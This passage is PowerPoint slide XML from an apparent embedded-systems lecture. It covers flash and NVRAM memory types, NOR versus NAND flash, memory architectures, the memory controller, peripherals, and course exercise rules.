                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Erase cycles are limited (10,000-100,000)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Good for data storage, “Non-Volatile” memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29236503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smtClean="0"/>
              <a:t>Flash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326659" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Technologically similar to EEPROM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Much cheaper than EEPROM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>High density</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Erase is at a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>sector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> granularity </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Sector ranges from 256B to 64KB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Sets all bits in the sector to ‘1’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“write” operation can only flip bits to ‘0’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Very durable – to shock, pressure, extreme temperature, water</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>10,000 – 1,000,000 erase cycles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2007992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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>NOR Flash vs. NAND Flash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327683" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>NOR Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Fast read, slow write, slow erase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Random access for read/write</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Suitable for code execution (XIP – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>eXecute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> In Place)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>NAND Flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Faster write &amp; erase</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Smaller size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Access is at a block level</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Suitable for mass storage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1560155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Battery-powered SRAM</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Also called “Non-Volatile RAM”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>While main power of device can be off, the battery can be on and power a small SRAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So in fact the SRAM becomes a non-volatile storage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="459070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Exercises</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Submit in pairs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>No triplets, no singles discount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Consulting – yes, copying of any written material – no</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exercises, weight and submit dates are already published in website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Note: last exercise submit date is ~1 month after end of semester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>2 point penalty for every day late, up to 10 days</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After 10 days, exercise will not be accepted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Grading will be based on automated testing, manual testing and code review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Emphasis on the main concepts of the exercise &amp; design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t work until 2am to cover every corner case!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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Memory types - summary</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="328849" name="Group 145"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131881485"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="990600" y="1676400"/>
          <a:ext cx="6781800" cy="4256088"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="990600"/>
                <a:gridCol w="914400"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="685800"/>
                <a:gridCol w="990600"/>
                <a:gridCol w="1219200"/>
                <a:gridCol w="838200"/>
              </a:tblGrid>
              <a:tr h="5182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dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>Type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Volatile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Writable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Erase size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Erase cycles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Cost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Speed</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SRAM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DRAM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Masked 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(in quantity)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dirty="0" smtClean="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" charset="0"/>
                        </a:rPr>
                        <a:t>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Once</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cs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cs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5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 (externally)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Entire chip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EEPROM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R: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W: +</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Flash</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Sector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R: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W: +</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NVRAM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58072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smtClean="0"/>
              <a:t>Memory Architectures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="332803" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Small scale:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Code on ROM, runtime data in small SRAM; small storage on EEPROM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Moderate scale:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Init code on ROM, rest of code on NOR flash, runtime data in SRAM, storage on NOR flash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Large scale:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Code on NOR Flash, runtime in DRAM with a small data SRAM cache, mass storage on NAND flash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4047564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Memory Controller</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>Memory Controller </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>memory arbitrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>address decoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) is the first stop on the processor’s memory bus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Maps address to the memory device</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>May apply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>protections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>over memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>(memory protection unit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> [MPU], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>memory management unit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>[MMU])</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="512202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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Memory Controller – first stop in the address / data bus</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2050" name="Object 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="1981200"/>
          <a:ext cx="8005763" cy="4495800"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s2090"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8005763"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1585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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Peripherals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331779" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Any hardware in the system that is not the processor or memory is a peripheral</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Peripherals are the hardware devices that make the embedded system interesting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="766089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smtClean="0"/>
              <a:t>Peripheral examples</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335875" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Buttons, keyboard, mouse, touch-pad, temperature sensor, gyroscope, microphone, fingerprint scanner, camera</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Output</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>LEDs, LCD screen, audio, printer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>I/O</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Network device (wired, wireless, cellular, satellite)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Offload engines</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Cryptography offload, media processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Bus controllers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>SPI controller, memory controller</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Storage devices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3021826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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Peripherals connection to the CPU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
